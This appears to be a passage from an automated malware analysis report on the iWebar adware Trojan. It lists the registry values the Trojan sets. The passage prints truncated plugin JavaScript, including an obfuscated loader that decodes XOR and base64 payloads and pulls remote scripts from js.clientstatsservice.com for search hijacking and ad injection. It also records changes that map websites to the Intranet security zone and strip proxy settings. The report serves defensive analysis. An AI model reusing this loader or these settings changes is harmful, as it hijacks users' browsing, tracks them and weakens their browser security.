"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100)};appAPI.openURL(a);}});appAPI.internal.callbacks.setEventHandler(runHelper,function(b){if(appAPI.isActiveTab()){var a=b;appA"

[HKCU\Software\iWebar\Plugins\17]
"Version" = "4"

[HKCU\Software\iWebar\Plugins\47]
"Version" = "3"

[HKCU\Software\iWebar\Plugins\182]
"Name" = "openUrl"

[HKCU\Software\iWebar\Plugins\246]
"JavaScript" = "setup2=function(d,a){var b=function(i){var k=function(l){if(typeof l!==string||l.length===0){return;}return l.replace(/.|\n/g,function(m){return m.charCodeAt(0).toString(16);});};var j=function(l){return l.match(/.{1,2}/g);};var g=j(k(a));var h=g.length;var f=$jquery_171.map(j(i),function(l,m){return(parseInt(l,16)^parseInt(g[m%h],16));});return String.fromCharCode.apply(String,f);};var e=function(){var i=appAPI;var g=i.utils;var h=g.Base64;var f=h.decode;return b(f.call(h,d));};var c=function(){var f=appAPI.JSON.parse(e());try{appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[f.pluginId]=function(){appAPI.internal.monetization.addRemoteJS({httpUrl:(typeof f.httpUrl===string)?(f.httpUrl.replace(/__CROSSRIDER_SUB_ID__/g,appAPI.internal.monetization.getSubId()).replace(/__CROSSRIDER_APP_NAME__/g,encodeURIComponent(appAPI.appInfo.name)).replace(/__CROSSRIDERG"

[HKCU\Software\iWebar\Plugins\45]
"Version" = "4"

[HKCU\Software\iWebar\Plugins\21]
"Version" = "5"

[HKCU\Software\iWebar\Plugins\102]
"Name" = "dealply_m"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\iWebar\Plugins\78]
"JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)<0&&/(mozilla)(?:.*? rv:([\w.] )|)/.exec(h)||[];var f=/(ipad)/.exec(h)||/(iphone)/.exec(h)||/(android)/.exec(h)||/(windows)/.exec(h)||/(mac)/.exec(h)||/(linux)/.exec(h)||/(ubuntu)/.exec(h)||[];return{browser:g[1]||,version:g[2]||0,platform:f[0]||};};a=d.uaMatch(c.navigator.userAgent);b={};if(a.browser){b[a.browser]=true;b.name=(b.rv?msie:a.browser);b.version=a.version;}if(a.platform){b[a.platform]=true;b.os=(a.platform===windows?win:a.platform);}if(b.chrome||b.opr){b.webkit=true;}else{if(b.webkit){b.safari=true;}}if(b.rv){b"

[HKCU\Software\iWebar\Plugins\42]
"JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;A"

[HKCU\Software\iWebar\Plugins\46]
"URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IETimers.js"

[HKCU\Software\iWebar\Plugins\226]
"JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[226] = function() { if (appAPI.internal.monetization.loader && appAPI.internal.monetization.loader.setCampaignId) { appAPI.internal.monetization.loader.setCampaignId(1026); }};"

[HKCU\Software\iWebar\Plugins\9]
"URL" = "http://js.clientstatsservice.com/plugins/mins/searchengines_hook.js"

[HKCU\Software\iWebar\Plugins\246]
"URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/setup.js"

[HKCU\Software\iWebar\Plugins\102]
"Version" = "7"

[HKCU\Software\iWebar\Plugins\3]
"Name" = "ie8_fix_2"

[HKCU\Software\iWebar\Installer]
"srcid" = "000169"

[HKCU\Software\iWebar\Plugins\37]
"Name" = "IEBrowserEvents"

[HKCU\Software\iWebar\Plugins\93]
"URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/superfish_no_coupons_m.js"

[HKCU\Software\iWebar\Plugins\45]
"URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEOnRequest.js"

[HKCU\Software\iWebar\Manifest]
"Version" = "268"

[HKCU\Software\iWebar\Plugins\13]
"Name" = "CrossriderAppUtils"

[HKCU\Software\iWebar\Plugins\217]
"Version" = "18"

[HKCU\Software\iWebar\Plugins\35]
"Name" = "IEAjax"

[HKCU\Software\iWebar\Plugins\220]
"JavaScript" = "if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){if(!String.prototype.trim){String.prototype.trim=function(){return this.replace(/^\s |\s $/g,);};}if(!Array.prototype.filter){Array.prototype.filter=function(f){if(!this){throw new TypeError();}var k=Object(this);var e=k.length>>>0;if(typeof f!==function){throw new TypeError();}var j=[];var h=arguments[1];for(var g in k){if(k.hasOwnProperty(g)){if(f.call(h,k[g],g,k)){j.push(k[g]);}}}return j;};}if(!Array.prototype.forEach){Array.prototype.forEach=function c(l,f){var h,g;if(this==null){throw new TypeError(this is null or not defined);}var i,j=Object(this),e=j.length>>>0;if({}.toString.call(l)!==[object Function]){throw new TypeError(l is not a function);}if(arguments.length>=2){h=f;}g=0;while(g
[HKCU\Software\iWebar\Plugins\195]
"URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/icm_convertmedia_m.js"

[HKCU\Software\iWebar\Plugins\47]
"URL" = "http://js.clientstatsservice.com/plugins/mins/resources_background.js"

[HKCU\Software\iWebar\Plugins\177]
"JavaScript" = "(function(){if(!(appAPI.isMatchPages&&appAPI.isMatchPages(*crossrider.com/extension_dashboard/dashboard.html))){return;}function o(p){return String(p).replace(//g,>);}function e(aR,aC){function aW(){while(aE.length&&(aE[aE.length-1]=== ||aE[aE.length-1]===aT)){aE.pop();}}function aq(p){return p===[EXPRESSION]||p===[INDENTED-EXPRESSION];}function af(p){return p.replace(/^\s\s*|\s\s*$/,);}function an(q){aQ.eat_next_space=false;if(ag&&aq(aQ.mode)){return;}q=typeof q===undefined?true:q;aQ.if_line=false;aW();if(!aE.length){return;}if(aE[aE.length-1]!==\n||!q){ac=true;aE.push(\n);}for(var p=0;p
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\iWebar\Plugins\91]
"JavaScript" = "(function(i){var l=05-20;if(!appAPI.isBackground&&appAPI.dom&&appAPI.dom.isIframe()){return;}var t=appAPI.utils.MD5;if(!t||!t.encode){t={};t.encode=function(H){return H;};}if(typeof appAPI.internal.monetization===undefined){appAPI.internal.monetization={};}var C=appAPI.utils;var F={DBNamespace:monetization_plugin_,RULS_JSON_NAMESPACE: rules_,MONETIZATION_PLUGINS_IDS:monetization_plugins_ids,IS_INSTALL_REPORTED:is_install_reported_,STATS_NAMESPACE:stats_,PLUGINS_VERSION:plugins_version_,GEO_URL:http://ipgeoapi.com/,BASE_DATE:new Date(2013,0,1),updateInterval:1000*60*60*6,rulesJsonHostUrl:http://app.clientstatsservice.com/monetization_campaigns/,statsHostUrl:http://logs.clientstatsservice.com/monetization.gif?,errorHostUrl:http://errors.clientstatsservice.com/monetization-error.gif?,countryName:,reportQueryString:,subID:000000000000000000,reportEvents:{installEventId:0,dailyEventId:1,vertical:2,runningPlugins:6,installVertical:13,impressionsEventId:31,newAllowedVertical:32,policyA0G"

[HKCU\Software\iWebar\Plugins]
"PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94"

[HKCU\Software\iWebar\Plugins\93]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGM3YjY0NDUwNjExMTExZjNhMTMxYjUzNTc0NzRjMGQxMTFiMWY1YjU4NWUxYTEwMTk0YjE2MWExZjA0MDUxNzA0MTQwNjRiMDYwMDAyNGUwMDAyNDIxNDA4M2EwODBlMDYwZjU5MWIxZTE3NTEwMTA5MWMwMDE0MDUxMjA4NWEwNjBkMTMxNTAyMDgxYzA2NGIxMjFkMDAxNzI2MGI1YzE2MTMwZTQxMmQzMTJjMmI1MjNlMjgzMjNmMjgzZDM2MzcyNjJiMjQyNTJlM2UzMjJjM2EyYzJiMzAzZTU1NWQ2NzZlNGMwZDExMWIxZjEyMjIwMzAxNDU1NDQ1NDcwNzFiMTUwNzAyNTc0ODQxMTIxMjE4NDExMjAyMDEwODE1MDgwYzE2MDc0MTAyMTgxYzQyMTAxZDRhMTYwOTMwMGMxNjE4MDM0OTA0MTYxNTUwMGIwZDA0MWUxODE1MGQwMDU4MDcwNzE3MGQxYzA0MGMxOTQzMTAxYzBhMTMzZTE1NTAwNjBjMDY0MzJjM2IyODMzNGMzMjM4MmQzNzJhM2MzYzMzM2UzNTI4MzUzMTM2MzAyZDMwMjgzMzJlMzI0NTQyNmY2YzRkMWYwZDAyMTYwNDA5MjcwMTQ3NTU0ZjU4NDQ1ZDY3NDc0ZTQ1NDU0ZDE5MDQwNTA1MDQwNDBmMDk0NzU1NGYzYTU1MDIwNTA4MWUxNTBjMDEwODQzMmE3YjEw', 'wqmgneeooa'); }"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\iWebar\Plugins\93]
"Version" = "10"

[HKCU\Software\iWebar\Plugins\17]
"URL" = "http://js.clientstatsservice.com/plugins/mins/jQuery.js"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\iWebar\Plugins\207]
"Version" = "2"

[HKCU\Software\iWebar\Plugins\28]
"URL" = "http://js.clientstatsservice.com/plugins/mins/initializer.js"

[HKCU\Software\iWebar\Plugins\36]
"URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEBackground.js"

[HKCU\Software\iWebar\Plugins\104]
"Version" = "9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\iWebar\Plugins\91]
"URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/monetizationLoader.js"

[HKCU\Software\iWebar\Plugins\28]
"Version" = "4"

[HKCU\Software\iWebar\Plugins\223]
"URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/imonomy_m.js"

[HKCU\Software\iWebar\Plugins\22]
"URL" = "http://js.clientstatsservice.com/plugins/mins/resources.js"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\iWebar\Plugins\43]
"URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEMessaging.js"

[HKCU\Software\iWebar\Plugins\36]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eve"

[HKCU\Software\iWebar\Plugins\220]
"Version" = "8"

[HKCU\Software\iWebar\Plugins\102]
"URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/dealply_m.js"

[HKCU\Software\iWebar\Plugins\22]
"Name" = "resources"

[HKCU\Software\iWebar\Manifest]
"UninstallerOfferAction" = "NA"

[HKCU\Software\iWebar\Installer]
"zdata" = "eyJkYXRhIjp7ImRhdGUiOiJFNjR3bGlteXUxLDc0MjYxNDA5LWZiNTQtNDM2Yy1iNTk3LTFiMDllZjAzNTQwZCwiLCJ1bnEiOiI3NDI2MTQwOS1mYjU0LTQzNmMtYjU5Ny0xYjA5ZWYwMzU0MGQifX0="

[HKCU\Software\iWebar\Plugins\1]
"Name" = "base"

[HKCU\Software\iWebar\Installer]
"ErrorsDomain" = "http://errors.clientstatsservice.com"

[HKCU\Software\iWebar\Plugins\41]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""

[HKCU\Software\iWebar\Plugins\155]
"URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/ibario_pops_m.js"

[HKCU\Software\iWebar\Code]
"NewTabJavaScript" = ""

[HKCU\Software\Crossrider]
"Bic" = "92F4CE5DE43B4200BD216411591F0444IE"

[HKCU\Software\iWebar\Plugins\9]
"JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:'

  • '});this.addEngine({name:bing,url:bing.com,input:input[name=q],results:#results > ul,result:'
  • '});this.addEngine({name:yandex,url:yandex.ru,input:form.b-head-search input.b-form-input__input,form.b-search input.b-form-input__input,results:.b-body-items > ol,result:'
  • '});this.addEngine({name:yandex,url:yandex.com,input:form.b-search input.b-form-input__input,#searchInput,results:.b-serp2-list__portion,result:'
    '});this.addEngine({name:yahoo,url:yahoo.com,input:input[name=p],results:#web ol:eq(0),result:
  • });this.addEngine({name:yahoo,url:search.yahoo.com,input:input[name=p],results:#web ol:eq(0),result:
  • });this.addEngine({name:ask,url6"

    [HKCU\Software\iWebar\Plugins\72]
    "Name" = "appApiValidation"

    [HKCU\Software\iWebar\Plugins\42]
    "Name" = "IEInternal"

    [HKCU\Software\iWebar\Plugins\244]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/engageya_inner_m.js"

    [HKCU\Software\iWebar\Plugins\104]
    "URL" = "http://js.clientstatsservice.com/plugins/javascripts/monetization/geo/jollywallet_m.js"

    [HKCU\Software\iWebar\Plugins\223]
    "Version" = "5"

    [HKCU\Software\iWebar\Plugins\177]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/crossriderDashboard.js"

    [HKCU\Software\iWebar\Plugins\226]
    "Name" = "set_campaign_id_m"

    [HKCU\Software\iWebar\Plugins\183]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=__TABS_ON_UPDATED_ACTIVE_KEY;var c=__tabsOnUpdateActive__;var a={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(!appAPI.utils.isFunction(appAPI.internal.globalEval)){appAPI.internal.globalEval=function(e){(new Function(e)).apply(window);};}if(appAPI.internal.scope==a.SCOPE.BACKGROUND){appAPI.tabs.reloadTab=function(e){if(typeof e.delay===number){appAPI.setTimeout(function(){appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});},e.delay);}else{appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});}};appAPI.tabs.executeScript=function(e){appAPI.message.toAllTabs(e,{channel:__tabsExecuteScript__});};appAPI.tabs.onTabUpdated=function(e){if(typeof e!==function){return;}appAPI.message.addListener({channel:__tabsOnTabUpdated__},function(f){e(f);});appAPI.internal.db.set(d,true);appAPI.message.toAllTabs({},{channel:c});};}else{if(appAPI.internal.scope==a.SCOPE.PAGE&&!appAPI.dom.isIframe()){var b=functiG"

    [HKCU\Software\iWebar\Plugins\64]
    "JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){i6"

    [HKCU\Software\iWebar\Plugins\4]
    "JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f(< a >).appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:) ),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,display),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject(Microsoft.XMLHTTP)}catch(b){}}function ci(){try{return new a.XMLHttG"

    [HKCU\Software\iWebar\Manifest]
    "ChangePrevious" = "false"

    [HKCU\Software\iWebar\Plugins\64]
    "Version" = "3"

    [HKCU\Software\iWebar\Plugins\223]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MDg3OTczNGUwYTFiMWExMzNkMDgxZjUxNDA0YzQwMDcxYTE3MTg0MDVjNWMxOTA4MGM0MTE4MGExYjFiMTcxNzU0MGYwZDAyNDExMDBiMDgxYTAzMGU0MzUzNWI1YjU1NWY0ZDQxNDY0ZDVhNTc0MDFlMTEwZDE2MWMxMjFlNDIwODFjNTExMDFkMTgxYTE3NDczMzNkMmMzYzJjM2IyOTIxM2EzZTI5MzAzMDNkMzYyYTI1M2EzNzI1MzM0MDQzNjQ2YTRhMGExZjA2MWQwNTBjMjYwYTQxNTI1YTQxNDE0OTQwNjg0ZjRlNDM0ODU4MDUxNjA4MTgwYjBjMGYwZjRhNDA1MzI4NTgxZjBhMDAxZTEzMDExNDE0NTEyNzY2MWY=', 'sszlbonchz'); }"

    [HKCU\Software\iWebar\Manifest]
    "IsButtonEnabled" = "false"

    [HKCU\Software\iWebar\Installer]
    "CodeDownloadDomain" = "http://js.clientstatsservice.com"

    [HKCU\Software\iWebar\Plugins\183]
    "Version" = "4"

    [HKCU\Software\iWebar\Installer]
    "Time" = "1401908096"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "IntranetName" = "1"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "UNCAsIntranet" = "1"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    "ProxyBypass" = "1"

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"
    "ProxyServer"
    "ProxyOverride"

    The process iWebar-codedownloader.exe:2412 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKCU\Software\iWebar\Plugins\72]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/appApiValidation.js"

    [HKCU\Software\iWebar\Plugins\244]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTI2MTcxNGIxYjAyMTUwMjMzMGIwNTQ5NDI0OTUxMWUxNTA2MTY0MzQ2NDQxZDExMDc0NzRmMTcwODFlMDgwYzFkMTAxMjU4MDIxZDBiNTYxZTAyMWMwZTE2MDI0ZTFiMDgxMzBjMDgwYzM2MDAwNjAwMDAwZDU2MDAwNTEyMzYwMDA2MTMxOTM5MGExZDBhMGExZDE2MDQ0ZjE4MTU0NjE5MDIxYzU0M2YyMjI0MDEyOTNkMjg1YTM3MmQyMjA1MmMxODAxNGEyNDAxMzExYTNkMzIwMjQ2MjkyZDI4NGU0YjJkNTUwNTE0MTAwZjFkNTQzNDI3MmEyMTM5MzIyMTM0MzAyZDJlMmEzNjIwMjMyMzJkMmYzZDM2MzQ1YTQ1Nzk3ZjQzMDIwYTBjMGUwMjE2MjAxNzU0NWI1MjU0NGQ1ZDYxMDU=', 'ikxisvarfy'); }"

    [HKCU\Software\iWebar\Manifest]
    "BgVersion" = "1"

    [HKCU\Software\iWebar\Plugins\1]
    "Version" = "10"

    [HKCU\Software\iWebar\Plugins\78]
    "Name" = "CrossriderInfo"

    [HKCU\Software\iWebar\Manifest]
    "ThanksUrl" = "NA"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 24 00 00 00 01 00 00 00 00 00 00 00"

    [HKCU\Software\iWebar\Plugins\4]
    "URL" = "http://js.clientstatsservice.com/plugins/javascripts/jquery-1_7_1_min.js"

    [HKCU\Software\iWebar\Plugins\244]
    "Version" = "2"

    [HKCU\Software\iWebar\Plugins\7]
    "Name" = "hooks"

    [HKCU\Software\iWebar\Plugins\220]
    "Name" = "icm_base_m"

    [HKCU\Software\iWebar\Plugins]
    "OnRequestPluginList" = "14,42,41,39,38,43,45,64,72"

    [HKCU\Software\iWebar\Code]
    "AppJavaScript" = " /************************************************************************************ This is your Page Code. The appAPI.ready() code block will be executed on every page load. For more information please visit our docs site: http://docs.crossrider.com**********************************************... = http://wt.iwebar.com;TOOLBAR_URL = HOST '/js/toolbar.js';AFFILIATE_ID = 'NONE';appAPI.ready(function($) { /* if (appAPI.db.get('user_id') === null) { if (appAPI.db.get('installation') === null){ appAPI.db.set('installation', new Date().getTime()); return; } else { if ((new Date().getTime() - appAPI.db.get('installation')) < 1000 * 60 * 60 * 48){ //No need to display toolbar... hasn't been 2 days yet. return; } } }*/ console.log(=======> Extension [version: appAPI.appInfo.version ] loading...); // Set the affiliate ID //appAPI.db.set('affiliate_id', AFFILIATE_ID); // Include the Base64 library appAP"

    [HKCU\Software\iWebar\Plugins\217]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/similar_products_m.js"

    [HKCU\Software\iWebar\Plugins\45]
    "Name" = "IEOnRequest"

    [HKCU\Software\iWebar\Plugins\44]
    "Version" = "6"

    [HKCU\Software\iWebar\Plugins\94]
    "JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.se2L"

    [HKCU\Software\iWebar\Plugins\28]
    "Name" = "initializer"

    [HKCU\Software\iWebar\Manifest]
    "EnableSearchIE" = "false"

    [HKCU\Software\iWebar\Plugins\220]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/icm_base_m.js"

    [HKCU\Software\iWebar\Plugins\47]
    "JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:http://resources.crossrider.com,staging:http://staging-app.crossrider.com},update:/apps/{appId}/resources/meta/{lastVersion}},env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:(appAPI.internal.debug.isDebugMode()&&appAPI.internal.db.get(debug_resources_path))},w=o(meta)||{},g=o(remote_resources)||{remoteId:0},t=o(queue)||{},B=o(lastVersion)||0,A,s;appAPI.resources={init:function(){if(C.isDebug){h();}else{l(function(D){if(D){k();}else{h();}});}},isReady:function(D){s=D;if(A){h();}},get:function(D){if(typeof jQuery!==undefined){D=jQuery.trim(D);}return b(D,string);},includeCSS:function(G,F){if(typeof jQuery!==undefined){G=jQuery.trim(G);}var E=bAP"

    [HKCU\Software\iWebar\Manifest]
    "Description" = "iWebar"
    "UpdateInterval" = "360"

    [HKCU\Software\iWebar\Plugins\269]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/stats/ie.js"
    "Name" = "stats_ie"

    [HKCU\Software\iWebar\Plugins\44]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEMisc.js"

    [HKCU\Software\iWebar\Plugins\46]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setInsL"

    [HKCU\Software\iWebar\Plugins\93]
